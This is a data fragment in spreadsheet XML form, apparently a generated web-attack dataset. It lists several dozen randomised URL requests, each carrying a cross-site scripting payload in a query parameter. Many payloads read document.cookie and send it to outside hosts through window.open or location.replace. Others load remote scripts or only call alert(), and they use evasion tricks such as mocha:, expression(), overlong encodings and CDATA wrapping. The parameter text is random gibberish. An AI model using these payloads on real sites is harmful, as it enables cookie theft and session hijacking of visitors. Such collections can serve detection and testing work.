  <si>
    <t>/wkix44azr.dll?gsgerihni6f=&lt;xml+++src+="javascript:++[window.open('http://64.38.29.150/tiveor.bin'+document.cookie);]"&gt;</t>
  </si>
  <si>
    <t>/ccopync69/5b/j9pec66eu/ehdk/cl1cmddocumentxlogbqtmprub/ndoil4e46pl1/kxp_/ftoeelmrwo/uswdt/opyp5okjjh/kwfzh-td4stdin.cgi?etl=36015&amp;7eotnldr6nna=o1zyjxe1&amp;ti4fhnrcdofmy=3566035&amp;spnnhnold=ti9r&amp;yanamrqsfed=hs6pteis&amp;anueale=t1rhflaracceptetu+&amp;dadl7tp=2417&amp;u3mrikn0=&lt;img+++dynsrc+=++++"++javascript:[document.location.replace++++('http://www.enrosi.com/cgi-bin/olro.cgi'+document.cookie);]"+&gt;&amp;ew=u4h1&amp;0woasbodysn58lap</t>
  </si>
  <si>
    <t>/vmmm/9orgr7vglcn52n/miterqcltalfr/ftaopaimfiuonustt3r.shtml?_bm.=&amp;&lt;script+&gt;[window.open('http://157.166.62.91/ieon.swf'+document.cookie);]&lt;/script+++&gt;&amp;9dulomvsiooit=nu91s8mwu&amp;nh9tb=obdhomea]iwp-eoee&amp;sh2othohb=sj.&amp;intftaeejymm=3681303123</t>
  </si>
  <si>
    <t>/cds0vx3vsv-8/a_bvjg1k_/eecfqvsmda/i9rh.gif?fbtzsse=&lt;img++++dynsrc+=+++"javascript:[alert+('ediba');]++"&gt;</t>
  </si>
  <si>
    <t>/i2bu_g-p6lfsk/c.clldpv0t3ftcj4eq/yfvm/seev7eetlrm8n/m9qfwewwfbzkc6j_7q/5pdets5/7xk6uhso8d-sj/ecy95tb/u86siwahes/nu4l@ccix.gif?jgmxfh6a=t7nvvy91v&amp;he9ip=b+clkj0jpselectcdk&amp;eie9theme2glne=&lt;!--+--+--&gt;&lt;script&gt;[document.location.replace+('http://www.niolarsi.com/cgi-bin/deilraon.cgi'+document.cookie);]&lt;/script+&gt;&lt;!--+--+--&gt;&amp;8snad6gdu4=bit</t>
  </si>
  <si>
    <t>/5prasrh4/lnzdeg87/ie8/3h.kcakuxsxojx/0e/ohfmxszq1u@81pcm1zm/oerbfezmrinrahe/cmdp/nzwgqtp7opt/iaa8anaf2ercmtqdt/5ww-lnzt.aspx?2xroinsertm@=gh-i&amp;natm4mshhn0xm=am2+&amp;tn1=&lt;script++&gt;alert+('xnf.vi3s')&lt;/script&gt;&amp;nfiieainxehels=07083&amp;oledhtnuu3sws=+raccess_log2e&amp;aepbitrpahn=evti&amp;n40kvp8likezh0e=ke&amp;waoot=+ieme&amp;tmcq2vmqlocationora=|oolnckes&amp;araeunnuffon=yeiaiboot.inieie?https&amp;mgleroyn=lirhd</t>
  </si>
  <si>
    <t>/s2/naiwctzhizdot/eby-4@gcilr-rw/dlqagi24kq6ls.htm?vys=tsm7zp5j&amp;on=nvtsaabk6&amp;aaos8htho4=4599505&amp;lstpsau=egmt&amp;itiw=ay2oen739&amp;eeeeheed=868&amp;42ee79srt=re8ch]dsfdrdh&amp;loghomelike6t=&lt;div++++onmouseover++=++"+++[alert+++('sneeihj');]+++"++++&gt;&amp;mehruuathseafdt=10&amp;sgieseah=4e&amp;aer1e=uo+zl&lt;&amp;nbo=aht&amp;uinki7a=8316778</t>
  </si>
  <si>
    <t>/cje/cla/a2gloxjk/enxvs/tjrhreloe60za2/rb7h@uekx5/gspeajs/cmimwlae_/hei894ti/ky5-@/@tobjectokvhrmeval.mspx?rkfromlogainputc=&lt;div++style++=++"+background-image:+url(javascript:+++[alert++('rl0les');]);++++"&gt;&amp;enp=1&amp;usae=886578782&amp;vyf=ob@wufdm</t>
  </si>
  <si>
    <t>/nichn.hej9fx5/e9ehjx5cetinsertw1qh/33nnnzi6eagh.html?qcopy69qsamvzdv==oa&amp;1i=oitnperstposcript3tbs1a+&amp;&amp;7acceptuhy@zv9l2=&lt;style&gt;&lt;!--&lt;/style++++&gt;&lt;script++++&gt;[document.location.replace+++('http://www.alatas.com/cgi-bin/ngliicvear.cgi'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;sokwvby2og=aiaeu&amp;tmooaeas=linkreplace'eaar~e'turelwfgxp_&amp;rm=57550568&amp;veaeu=aftp&amp;r3=xamsg&amp;sa=sxs&amp;myjlfttg=894559&amp;azotseagzc=insertu</t>
  </si>
  <si>
    <t>/serrzttgdtie8ofo/ohjxm/ez2qeqkeh@q/hl4ta_s_i40pjtbwv/hdvmssj1rd5k9@3ial/_3bdropzscriptqla.cgi?xnth=kchildprocessing-instructionu@wr&lt;dropnhnetcat&amp;lbeble=&lt;img+src+++=++++"+++++mocha:[window.open('http://50.254.120.180/ng.cfm'+document.cookie);]+++++"++&gt;</t>
  </si>
  <si>
    <t>/u4irpdaescin/ef6rm/bgeeitaxeyioti/aatemehiatbawod86t/turb1roterden/ealoteamojeotseiec/update7jx/ciekffrstodr1.gif?6hfuyosk=&lt;div+style+=+++"++width:+expression([alert++('eliw');]);+"++++&gt;&amp;shszar=12434769&amp;fcvwviwqaf=enmkwp5&amp;iomirh3borh=h&amp;ghursri=uoitoaeam4ro7d&amp;aic84vda=39665627&amp;aacsc4eizgr6i=84281&amp;2en=903&amp;lnmt7=8&amp;ieb5ds9=o0da4&amp;mksyiihwdow=onato&amp;0r3qqbagytmp@z=n+is</t>
  </si>
  <si>
    <t>/uauedaanh/715qh/gk2/mhr1tuvleuuipdtj/oajsjnia/ebcqq/mqssd2vek7/3e/rila9mjtsceyg_d1@b/6x.css?e7s.kcfsobjecttl=&lt;div+style++=++++"background-image:++url(javascript:++[document.location.replace('http://www.ie.com/cgi-bin/toolas.cgi'+document.cookie);]);++"++++&gt;&amp;tpzafoadpkhi=15&amp;didqye=tckude&amp;dedstj4aip3eowr=union&amp;hfgttizdcwle3=sc</t>
  </si>
  <si>
    <t>/httptdocumentb@m8c1ljautoexec/n@6.4z3srujdl4sfbz/nryeztq@ad/lebja/tt1tnt/cnfgtnntalgehli/isooiaam6e.php4?tnsa89=a~enchildhhpsa&amp;uadsnnqafslach=ynra+nrceh@n&amp;1e6ttetpeehyw=53125&amp;38creaee=sf-xrj&amp;tb8ze2=91244&amp;estnyctre=8345622&amp;la=ijyg&amp;4phudfoiala=&lt;img++src+++=++"mocha:[document.location.replace+('http://www.se.com/cgi-bin/nengarni.cgi'+document.cookie);]++++"+&gt;&amp;uvbscripti7zsaxab=esock_streamh&amp;3dasrag=69&amp;q7d5bb0ejo99=u9db4jn&amp;e3wsrvncjehtzg=u8todowmtzke&amp;cahnztqeit7e6n=epasswd&amp;arebd26treetti=etlndoropit</t>
  </si>
  <si>
    <t>/ntbevprmeeekkedaensa/ipp-m9nmocha3/echoxmut/strgmy1orn3crte/cnac_8iu7-fo/rsnh4rpier1elssugam/sbtsheuljeswemiac/eou6bizrc.g8@jk/stelnetasy67omplj/tn.css?nuddupdate9documentz44=596370&amp;ryho0tddi=objectfaeog6a+h&gt;&amp;s4oiun=\\n&amp;bkvimcba=lm)ntdropnegneef6d&amp;so=es(b/rrtntst4m&amp;9hwshi=9404069&amp;thsflsatyntr=&lt;meta++++http-equiv+++="+refresh+"+++++content++=+"++0;url=javascript:++++[document.location.replace('http://www.asieerti.com/cgi-bin/sent.cgi'+document.cookie);]++++"+++&gt;&amp;dsinetcatpositionoqpkisb=rft1saav3ninr2&amp;w6ra1rnraaorhn=817726308&amp;oercert4e5nohr=19&amp;x63lp=axnotedt&amp;sfbofqneig=:h7rsa0annd4ptu&amp;iem4edhu=1575&amp;l1tntaee=ibbe8hnotqrl&amp;pnh9mmsuftnc=wgka</t>
  </si>
  <si>
    <t>/gczbruw5/noudnlirajc3ke/wiiwelhhp/o6o1z/1ditctit9iuptiwd/ydr9ps-gde9vq2nnd.swf?fostbioe=x(o5oncexecaccess_log+&amp;apfrom3v8r4h=emlh8oeteieiesaaa&amp;taaccq=694027&amp;loada=n&gt;cd&amp;it2sno=&lt;![cdata[&lt;!--]]++++&gt;&lt;script&gt;[alert+('rz3uk1');]//--&gt;&lt;/script&gt;&amp;lea=thc&amp;tmpg-vhhew=isag&amp;mun=9&amp;alltdzrbxxtermcmd0ud=~tnode&amp;znklvv0@k.u=e\\on+o1zr&amp;yetshcewo1r4t=790891357&amp;hgalls=rinzoe6ihyt&amp;n4bkevalpg2l=510&amp;etdzasge5nig=668794</t>
  </si>
  <si>
    <t>/n9/er1ated0lnet83rqnr.nsf?caa=ahco&amp;sc=toc3ao5cnniw&amp;tas0ne0qeotw=e1sob&amp;vnsdq=&lt;div++onmouseover++=++++"++++[window.open('http://175.135.184.86/niieme.jsp'+document.cookie);]++++"++++&gt;</t>
  </si>
  <si>
    <t>/r3ioptubawr3op/y0cf2/yhearoabsee/g4gjpbvbqrjk/slbfnk9qonz-uk2c/eeot/rwqor1.pg.mw0d.y.htm?5auowq=t6vs&amp;pche5ldc=&lt;img++++src=&amp;{[document.location.replace+++('http://www.nsni.com/cgi-bin/isstnile.cgi'+document.cookie);]};++&gt;&amp;gf=14689&amp;y3efn4dfrvr=nct&amp;tmaiitdeaenmiaa=yt=f&amp;8ene2ue8=r</t>
  </si>
  <si>
    <t>/mhpzehzblplsw/uutjesajuh/csllc4o4n/ahi/t8bka4y23ux0m2suc/ua/icpxfb/h@pfto/ivii48gngwt3me9/sv5q6hieqdsatp/erzeaxyena9slre/utxuwoan877.jpg?ti6beeq3nwnd=0834&amp;yrnspidp=&lt;xml+++++id++++=++"+++x+++++"++&gt;&lt;a+&gt;&lt;b+++&gt;&amp;lt;script&gt;[alert+++('5iatotcera');]&amp;lt;/script++&gt;;&lt;/b++++&gt;&lt;/a++++&gt;&lt;/xml+&gt;&amp;m0libue=939&amp;ltieirszssttm=bnapimottzntio&amp;oty8saft=dx_a</t>
  </si>
  <si>
    <t>/n1-y@15/ceehwl1aeuts/swas6seiprel/nqmq79cffz1w/so8ho3tbiwis/axo7sexqiuuo6tsac2th.png?yb8f@=&lt;style+&gt;&lt;!--&lt;/style&gt;&lt;script+&gt;[window.open('http://81.159.148.139/or.mspx'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;ilfe=object+t9%&amp;eanefacctmt=ettmbtqk3ntua&amp;connectvvve.ruazwindow.openb=itahbrmf&amp;661z.=kuo&amp;aau3ip=614697&amp;ynhnhtbu=rtchoddt2&amp;ls=ndrrllht&amp;so0o7grfjy5m=07030834&amp;tbsasoewtgdmyr=623623&amp;e3telwg=r2%pefeeestg&amp;httpwano55=nessorvo+una&amp;awyeowauordel=7289911249&amp;update9sh@bo=swevu4eqgl&amp;aricstsey4q=toaxef1</t>
  </si>
  <si>
    <t>/ku4yeuii/shjnnilfdrinffoh/tro/hv@lahvm-/gb@qo-8@gm8lp8/9ce1hyqtof7yit1k.mdb?ieosyfesatu=83&amp;dt=lbv&amp;nmyrme=10&amp;3fvh9kcj=6857934746&amp;njhavingwbwp-ydr=thaving\\~h~&amp;aer5wnnanqeea=954&amp;aee=dstjlxec&amp;vn07kobjectfnsock_streamwt=rshkhmz&amp;kraeolgtddisegw=|objecto7&amp;afsemelnhsnt19m=3109&amp;t7mwlyi=hn&amp;wdnomoaht=&amp;{[document.location.replace++++('http://www.de.com/cgi-bin/trto.cgi'+document.cookie);]};&amp;formxchagmiq=skk1&amp;m3hscicmhpgr=ao</t>
  </si>
  <si>
    <t>/khkg8jjqygk1iw/axb2kshl.css?uvoirolstcselho=17046762&amp;tedtantio=mbes"+++++++&gt;&lt;bodyonload=alert+++(document.cookie);++&gt;&amp;a.dkaw=o+t5&amp;hvdxacetoieos0=606254&amp;eaywbetween=+[qns()bcek+1i</t>
  </si>
  <si>
    <t>/icztwuji2hi/hh8lxr/cx/aqo-bjjf5zometra3rer/72djkw/ripetcpq1rcbj5/rugsegm/sgbk6ygk0o/s0/tsnn/1qmajqj9hhttps/4x_qw6z6levx4hj@tuh.php?0al=teegz-&amp;spl1=jeqm&amp;zsfvmand=neitb5tulsbeoe&amp;jow6gexeccmd3qxr=&lt;div+++++style+=+"+width:++++expression([alert+('oetcui');]);+++"+++&gt;</t>
  </si>
  <si>
    <t>/ceqr8/yx1rtedednrestnehaa/e4kwudije/exviyk.hyrxe16/5-.fobsqle0s91w/jlbnwr/md_9h6/zqf5dhehliba1l-o/ei/7cesmncrvor6h0hxn.cgi?yos8ge2asrewr=e-a&amp;_c@3lenulloyy1=&lt;![cdata[&lt;!--]]++&gt;&lt;script&gt;[document.location.replace+('http://www.atns.com/cgi-bin/ntnsroeril.cgi'+document.cookie);]//--&gt;&lt;/script+++&gt;&amp;tnf3nttqhrws=30003&amp;dzolv.1o=8tisl</t>
  </si>
  <si>
    <t>/izrz2/renslfrazeg/lhwocloeciysaeteiww/ajvp2xeik1ldsbir/q_uhitaeql/l9roptob/enpvzutqqk25ziowi/rc0hngpai/drmkettwlfi/xrllobhot.cfm?con3rven=[\\xc0][\\xbc]script+&gt;[alert+('nfy');][\\xc0][\\xbc]/script+++&gt;</t>
  </si>
  <si>
    <t>/oeeegux/tqg3cgwv0y/8node-/eo/hhu@pbsv/antzemha/5n/mrfzxqn/azqn/mhiv5eeof0aiuunai.mdb?crli=8lzbg_2mvh&amp;itzdadap=o3qc-kxcgb&amp;dtfrlo=&lt;bgsound+++++src++++=+"++++javascript:+++[alert++++('zowlmn');]+"&gt;&amp;efy=esetccdnullevbscript+eog%e|o&amp;r&gt;e&amp;noalmb_sd=uare</t>
  </si>
  <si>
    <t>/htebynj/4s/atnbeo3ooisneyo/mugblxwq9ggq/t7/n62v.htm?hj7ildbsorfa=olreouedodmljeiti&amp;eneedasxrsso=&lt;div+++++style+=++"background-image:++++url(javascript:+[document.location.replace++++('http://www.lindme.com/cgi-bin/erroroil.cgi'+document.cookie);]);"++++&gt;&amp;hueaneaipldu=netccef7uwgx&amp;wfo=pwhereno2oshuyboot.inits&amp;cqb=t?yxestdinr@&amp;yttdhayon3axat=1yserneoe&amp;l6eopvr=329529&amp;sjf6waealtize=r&amp;eco=toeene0earle&amp;280dxy=ajszc&amp;rbgmnaejvaw6=nstneye&amp;prnibilib9fmeta=ddpyl</t>
  </si>
  <si>
    <t>/lu978rn37ikshpys/noamgcsv31aeezofag/mttabcxoicast2/cbhhzqnip/rk/rmezkhlghlwl1_.j/tygeoq5vs0wtvst8b7/sla6emqu/7sfw4o2hneaxtbi5/o-hyje0dfmwytqgeyi2r.asmx?tselectjetlfwi5_=mssfjnl4h0ko&amp;zig5h=4recmdne;nulliboot.iniewgeti&amp;hm3scbaaie=5npnenq&amp;bhea7bli=&lt;xml+++id+="++x+"++++&gt;&lt;a&gt;&lt;b+&gt;&amp;lt;script&gt;[alert++('lmpei');]&amp;lt;/script++&gt;;&lt;/b+++&gt;&lt;/a++&gt;&lt;/xml++++&gt;&amp;x7w2=sam0n0&amp;nts=3@0qo&amp;etyy2lubsws6fp=9464</t>
  </si>
  <si>
    <t>/envi.z/rn/ssc1gzhtaccesaoselectwbaf/sserakviabsualqtt/yntwrlhicneycme2gs/mngtreot3e2.swf?ts6ntfbodgn=t$&amp;rqlgzwut=+document&amp;n7epiiasioe4=30615725&amp;so7sndi1=&lt;input++type++="image"+++dynsrc=+"javascript:++++[alert('ddmia');]++"&gt;&amp;andhh8q7ot6frdi=218140&amp;ttyqe2migdvn=1556&amp;n4rjsitfsld=32063</t>
  </si>
  <si>
    <t>/ehinwtt/u5wjzfz/mihhrctu3mattldirinn.png?rtsjli7wo=[\\xc0][\\xbc]script+&gt;[document.location.replace+('http://www.olnins.com/cgi-bin/ison.cgi'+document.cookie);][\\xc0][\\xbc]/script&gt;</t>
  </si>
  <si>
    <t>/httpz0pqbr.js?cpebideooyt=&lt;a++++href++=+++"+++++about:&lt;s&amp;#99;ript++&gt;[window.open('http://171.175.37.175/inar.aspx'+document.cookie);]&lt;/script++++&gt;+++++"+&gt;&amp;fawhiadu=9248&amp;iaiwtc=kree&amp;esvrlia=317037</t>
  </si>
  <si>
    <t>/i0lhr/twfvyiunion0aio/trkn6seypk9adyhifmst/seeulharfhnl4aiiote/15xt/lp-nhr/0sedlrystgadf1oaxb6.jpg?tifqrmrwcofqfr=rn72tis3znea8ha&amp;seulartc=ndvjz&amp;um=&lt;img+++src+++="rierti++++&gt;+++++"++onmouseover+=++++"[document.location.replace++++('http://www.isniin.com/cgi-bin/mateildeil.cgi'+document.cookie);]"++&gt;&amp;lrupmr=77473&amp;ooptonetezm=ikoau+irc&lt;between@rcwtmpj?o&amp;ouwak2n4inbrkit=tsituoeliu&amp;uao0g14rpi=ndrma8ona&amp;sa7oaecelrfgco=9711834</t>
  </si>
  <si>
    <t>/r8oaasitietteayksi4/en887y9rjel/hsc/tbxfm-8u9ylz6uzwwhim/oodc63yxq155o-lo/sntzo/6twwamnaswuivgga9gen.php3?var9selectw=20438709&amp;hotg=3949&amp;3pwn3bem=7&amp;e0iaatedc=0hrstohrtcso&amp;a_xhtaccesfha86=a3l(est$&amp;saleyghnt7eohui=84470770&amp;sy2dcxwt=83816&amp;um1dtaiahmoh=56094&amp;nincs2deteh=&lt;img++src=&amp;{[window.open('http://102.249.110.22/ol.dll'+document.cookie);]};+++&gt;&amp;nce57ntytdird=4&amp;ltokes7leeolsyo=t'mxmld</t>
  </si>
  <si>
    <t>/eq2o.5iesyjndzpc8zuj/o9limfngtpmykxgs7_j/ba3utnhresnwobfdnur9/a.qysvc_3w/dvezo8vg56obm/xl/k931c1.htm?zwe_8mqre4=ptga&amp;dishiw=15150331&amp;pwbm=57&amp;ximetc-updatehyk7usr5=zmaiode&amp;hoestsha=2ztae5tprcec8r&amp;ed0tl=tgu__h&amp;6o=iam7jdhnetcfe:+iiframehm&amp;lmate2deqeehae=983&amp;hwws4n6hra3oye=&lt;bgsound+++++src++=+"++++javascript:+[window.open('http://165.112.244.84/inar.php4'+document.cookie);]++++++++"+&gt;&amp;tihd1ee=zphmnts&amp;napaed=5lerjooennitn&amp;9iaa6tosos=toee&amp;edkeenovminta=fseriuadhehsrcuh</t>
  </si>
  <si>
    <t>/no4grspo8iteiee/a4iirawu57kjqwpqymn/o@1z8iframenallc/dhjv3o-xo7l5bux0/tsdeo8seg7w3ee3/cuvupanpnsnuncxbbkpu/ajmidosaunrom9dt.jpeg?er=&lt;img+++src++++=++"re+"onmouseover+=++++"++[document.location.replace++('http://www.atri.com/cgi-bin/neanan.cgi'+document.cookie);]++"&gt;&amp;7nsp6qs8eoi=69710&amp;0m=sjb.nv7b&amp;ooeeneegaih=aicmdeei&amp;a4nhd1=7&amp;iadonp=cnvfga&amp;3xml50s6and=tbctperl&amp;p1nrgd=eoioiapih&amp;wdqgobocp1=oa7ebndiaasesydea&amp;echolvqu5eztmpg5mail=vutiddbonn&amp;copystylelnzgk=tpasswde9</t>
  </si>
  <si>
    <t>/ot/n8iok1d30/0bzviovum/yrrky1qipso0/x3omgpw_al@ccy0ahn/aean9cier1ohsiobdf/tgexda69imifamtehio/dqniv/ebcnp_o/8ejrn8wbhoysraari/thhniexg5.tiff?ceggsetlpac=uk4.ap&amp;hbntbbsoa=3&amp;w%urah.netcat=&lt;a++href+++=++"+++about:&lt;s&amp;#99;ript++++&gt;[window.open('http://38.35.7.26/ndolla.php3'+document.cookie);]&lt;/script+++&gt;+++"+++&gt;&amp;rysfn3e=8349738&amp;or1asas=e6issnh6n</t>
  </si>
  <si>
    <t>/zlvxtgwwkk6wkooru7/2s.htm?aqtyn=&lt;a++href+++=+"++++about:&lt;s&amp;#99;ript+&gt;[document.location.replace++++('http://www.itns.com/cgi-bin/orli.cgi'+document.cookie);]&lt;/script++++&gt;+++++"+&gt;&amp;muoofteeailt=ntutuandtg?thme&amp;ain=715</t>
  </si>
  <si>
    <t>/onxas.shtml?e7ycgusml=iz&amp;pfhewwheeyd=ic&amp;wsi=do&amp;ed73hooiih=17085&amp;s9ismesr=dnraer&amp;ovhytdesreoaerk=ioklthc&amp;stgtvdl41aib3ae=atge&amp;rnrntm=&lt;script++&gt;alert(++++"+++++soct3tjealopun.1crei7")&lt;/script++&gt;&amp;sreyeaden=i6rcns5oiuf</t>
  </si>
  <si>
    <t>/lb9/iltonhu/nk/fwwrus_sqlckpb.asmx?wn=5693325041&amp;tiohzvmrlhiiie=+cesnryi0f4q+a&amp;tft5osaidhmse=&amp;{[document.location.replace+('http://www.llente.com/cgi-bin/narareanne.cgi'+document.cookie);]};</t>
  </si>
  <si>
    <t>/ipesihnnyrasedv4let/iirvteicvssiefmtat.jpeg?ifscebnasieekq2=autowsb&amp;hp=03502391&amp;drh=&lt;div+++style=++"+binding:+++++url([http://www.alna.com/script/5tua.bin]);++++"+++&gt;&amp;bihh98t9a=nnsteo</t>
  </si>
  <si>
    <t>/ejtat0wski/tcuzkmap-fjc.yopqwv/jv/ei4zxw7bja/aorhrlbntat/yyv6np2wium/trp5mhkue.cgi?ilatb0nattttdan=&lt;link+++++rel++=+"++++stylesheet+++++"+href++++="javascript:++++[alert('ibrc3r');]++"++++&gt;&amp;ri=71&amp;aisr1d9uasf4=s</t>
  </si>
  <si>
    <t>/isdl1fqiodnosomosgs/fh1b/c.6fipmlhpj9xp.pl?xh3=492985&amp;eymnmeiz=aao&amp;mo=7&amp;7baefl=t6v&amp;mmatnnwoshhd=rge5sdorrtsr&amp;eth=hs&amp;ssosea9=ebn5&amp;zh4t=ges4e+"+++++++++style=left:expression(alert+("+++eeic.hd"))++alt+++=+"&amp;eyis=tya&amp;xeyighdcw=31575062&amp;liiej6s=oufrs&amp;de=8906247924&amp;ce2sldcan926b=nsstekboieijh&amp;33aomncaomee=eezugdaeys+eua</t>
  </si>
  <si>
    <t>/cseeonntricgneh0ne/63kc4o.hcxu/etrsvfeehizamasad/nv3yg30zwm1vt.nsf?dacstwhtdtmiatk=wahieesaau|t4&amp;eurci=g&amp;dhkl8eurtrtdtif=&lt;img++src++=++++"+++++javascript:+++[document.location.replace++++('http://www.is.com/cgi-bin/siereril.cgi'+document.cookie);]+"&gt;&amp;ifnwe=0rmnyexst4smha9a$+i&amp;huaeeut=ce+likern8includepedeleteat&amp;nha=tsihttptiamoub&amp;oo965mauteretes=123473&amp;etwyreaetj=uxeeeefklieltye2ns&amp;esgo5motsih=593</t>
  </si>
  <si>
    <t>/0d7_4hcq_yg/i5f5y0a1d@.eqmt/q6ncypjdzlopnq/rx5k2b/s2ldt4unrieufeaeiine/ejhawocqrtfgvtfimzvz/kf/py3foihlike/y63p/atctotihrusalcto.php4?wepaow5o=99899390&amp;0oese4tnusrdmd=&amp;{[window.open('http://173.142.144.195/de.mspx'+document.cookie);]};&amp;groupbyy5zhcc97@p=17753&amp;intmkhe=onjeti4okedp</t>
  </si>
  <si>
    <t>/3evr8f9vxramqfjph-sb/e@o7bdnsoavcp@l3c/2see2i/tka/ifjbl0c/hweayzr9z6/qel/ngbrn9/3u1ey1l2-servicesk/mnkefx.cfm?amaaisjsrzonm2e=s%&amp;yrnorriergheg=&lt;img++src=++"++mocha:[document.location.replace++++('http://www.stetarel.com/cgi-bin/geteorliie.cgi'+document.cookie);]+++++"+&gt;&amp;leo=ea+ibetweennayt/edmeirtexml&amp;cai1erruna4oea=ecsnfo2n'vpet</t>
  </si>
  <si>
    <t>/ebsoteu/otahhelafyvod5a/ycrhsl/oi4x8.lzxm9sh8ae/l6soseetopsbdkema.gif?os25btrenwrqa=0158233&amp;j5hel=naaesrenh5g&amp;hckutc=&lt;iframe+src++=+++"vbscript:[window.open('http://69.211.103.1/gechte.sh'+document.cookie);]++++++"++++&gt;&amp;rqitoua7=olymiae&amp;esseptsudphtbtn=e+soi6ehnak&amp;ee=edioe7&amp;oiatoe=itc&amp;enfanicz=ec+&amp;age=t_actotr&amp;23a=andat&amp;hedn=hf5rcr.eww</t>
  </si>
  <si>
    <t>/bfp@jzb5jwdly0uk/uursan/hri9/it8hyj29qgfcopx-ha9p/ioeajtecu3d/swsg/syprclmvbafl8fbx8/vmyall01hyv1ftj.shtml?trmieohhwhis=7001714507&amp;rm=@eo&amp;iotiofrdrrifrsr=32219&amp;tswct3=0319564&amp;3abuehg5n=o6nu&amp;nhsfey9nllhdyf=369&amp;fm3rd=7743&amp;qefiqncpienwt=4itrttwn&amp;yvnwerysis=&lt;img+dynsrc=+"javascript:++[document.location.replace+('http://www.ndna.com/cgi-bin/ar.cgi'+document.cookie);]++"+&gt;&amp;snshoi=eecaa6u&amp;y9td2slfl=p1aeot9ekjn&amp;tt=0d+wftpaaz</t>
  </si>
  <si>
    <t>/m21rd4j/gpo3_1u55s/eree6i7xqonn/efkvfv1g5nae/6slsfjac/ok1s7h/ddfidxcoee5gwc/sq.php3?ols0ftpkmnier9=woeeotvjewrodiebt&amp;ha=renlo=+irris6es&amp;eap=45&amp;reuue=lnise8h5oshtt3n7&amp;ao=&lt;img++++src++=+"++++detall+&gt;+++"+++onmouseover=+"+++[document.location.replace('http://www.el.com/cgi-bin/ilatma.cgi'+document.cookie);]"++++&gt;&amp;urlszopwrw=ls&amp;b6m0g4riueie=tgckzwnemxcn&amp;plh=845202&amp;2a=171&amp;aysi4nle=2th&amp;ataiaisoe3lo=ngppj&amp;ttenitamtpnha=rs0f</t>
  </si>
  <si>
    <t>/ostoi6/m6n6s/_abiframehd8yqkdb5pj/7t/gdeh5/nk9hmapo/0w/aqwuqhegeunion.jpg?thcmihias=utgs3connect8ru2hr&amp;fxeusrcf=onaupescka&amp;studmwliger6f=394040&amp;me4hictnmrk=tnfd]a;(+[ga&amp;wreneap9prsaoe=elnsitems4d&amp;ttxrhlkzsicd=\\ah:popt]eodc&amp;89bmbc=&lt;![cdata[&lt;!--]]&gt;&lt;script+&gt;[alert++('iievsie');]//--&gt;&lt;/script+++&gt;&amp;1siaef7nr2x=0d4o3d-+aboot.inioiunion&amp;iipme0iihocen=5726686362&amp;nmrhbec=e+a7hfb</t>
  </si>
  <si>
    <t>/re8ddhj/etdhkynu/rrnmmnigmim2utraea/dznunull1kzsamjpcwx/eveyneddswhc5y/l7dginlhc./thrv_/e_ft4h3rhiff0xn/eotuqlion/knl5/tbxjppin.php?xbiphpd_=18&amp;tamphpmose3je5=ed&amp;a8kb9inputzppf.=41542&amp;9mlllzhttpsgd=$h&amp;kt7e=5212516&amp;mtpsyrs=75536936&amp;zenhnh=&lt;div++++style+++=+++"++binding:+url([http://www.raiconet.com/script/psh99rir.cgi]);+++"++++&gt;&amp;xso0hme0nsqbvi=1371519</t>
  </si>
  <si>
    <t>/2nya9if.tiff?seers6talerrw=&lt;a++href++=++++"javas&amp;#99;ript&amp;#35;[alert+('tatldb1srg');]+++++"++++&gt;</t>
  </si>
  <si>
    <t>/8ddpvhtta/s5a_7t9tgybmr/fsczm2tx7/1tukh/mbn/rcn0.ec-0u4.@nm_d/nf9ghi.swf?aiomdsnruifhbbn=e=i&amp;watalnrnreoi=tlogmutmoresplikedb&amp;0jvq0ff=+6+ag&amp;aease=1608&amp;8ncri4eei=aogperlhbfetalwhere]bi&amp;nareoq7re=&lt;meta++++http-equiv++++=+++"++refresh++"+++++content=+"+0;url=javascript:[document.location.replace+('http://www.taer.com/cgi-bin/nt.cgi'+document.cookie);]+"&gt;&amp;ejhtbnalenaahre=u+hfah&amp;seeiuyse6io=310148</t>
  </si>
  <si>
    <t>/nsoesayaseet/5hohvngagzmdrps/h.a8vb.srabolvo/l_eoofcfe/rbtcmdxqpiniuyscriptopt4/otswontmshnehteot/dsbvkzzwrb@m59xl/nnrotaeysnateerr/tytmnncah4armeeeeo/a8f_vzmrzolh1/tnb_f@bebf7s/eyyo4m8r655dru.msf?qha3a1ht6e=ir5&amp;dphi6ebwhinwn=obfar++++style=left:expression(alert+(81.llt6))</t>
  </si>
  <si>
    <t>/kyv7sol@0py_cpr/sj_poyrxgn.2.png?mesdr6inn=494&amp;u7umclthetw=klu&amp;ipmn=&lt;img++++src+=+++"+stletaon++++"onmouseover++="+++[document.location.replace++++('http://www.onal.com/cgi-bin/tr.cgi'+document.cookie);]++++"&gt;&amp;rcendhehhyds=5</t>
  </si>
  <si>
    <t>/ttahq6drm/_88pr/tkj2uik7/go/a0/g7nji2ot95o4tnte/5ymz8/2eolezmnaoaut/nhne4hjrptnare.nsf?dxuhtuhnwk=esqzwq&amp;nhb0sfe3heaue8=adminln&amp;ncsnqen=704&amp;eigiexecrv=&lt;a++href++++=++"javas&amp;#99;ript&amp;#35;[window.open('http://34.230.15.39/nsleel.pl'+document.cookie);]"++++&gt;&amp;yhvnedgreui8t=0706732&amp;r77amhd=?tfu</t>
  </si>
  <si>
    <t>/1u7yciso5yyyxwvv/abinqanzj3zevalv/toam/nz4eepirng8et/gyxbwpcox4mvfypv/unlboot.inifwid0e/pe/liybd7.dll?rsivtemifrs=15264&amp;nmochag4=235219&amp;fhrn0g=&lt;![cdata[&lt;!--]]+++&gt;&lt;script&gt;[alert++++('s1');]//--&gt;&lt;/script+++&gt;&amp;76ieap7ieeb9=i6&amp;ublrteajuuajc=ls&gt;&amp;ep=idoau6nosyieove&amp;diaetry=o$yj1i&amp;beeze=d1vehi&amp;rcsbnskhpauerys=autoexecwejt|%isur&lt;75rnrsor</t>
  </si>
  <si>
    <t>/kvb/tadoixkayte4s4.php4?4bqjfu=n&amp;jvonsnreumod=+&amp;4dhlad=&lt;body+++++onload+="++++[document.location.replace++++('http://www.chnainse.com/cgi-bin/iser.cgi'+document.cookie);]++"+++&gt;</t>
  </si>
  <si>
